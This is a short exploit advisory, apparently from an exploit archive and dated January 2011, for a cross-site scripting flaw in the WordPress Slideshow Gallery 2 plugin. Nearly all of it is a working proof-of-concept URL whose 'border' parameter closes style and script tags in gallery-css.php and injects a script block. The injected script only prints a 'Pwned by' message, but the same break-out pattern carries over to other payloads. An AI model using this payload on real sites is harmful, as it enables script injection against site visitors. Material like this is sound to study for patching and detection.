The WordPress Slideshow Gallery 2 plugin suffers from a cross site scripting vulnerability.
95f81ff5d5319986839d3984fe04c5f19ec6e9cb57da1a036a73eb93c22cc4ca
# Exploit Title: Wordpress Slideshow Gallery 2 Cross Site Scripting Exploit
# Date: 26 January 2011
# Author: Bret Hawk
# Software Link: http://wordpress.org/extend/plugins/slideshow-gallery-2/
# Version: 2xxx and Prior
# Tested on: Linux Unix
The Wordpress slideshow Gallery2 plugin suffers cross site scripting vurnebility which allows malicious users to inject the site with malicious script.
POC: http://localhost/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script>
vurnebility File - gallery-css.php
Best Wishes, Br3t Hawk
Email:brethawk@hotmail.com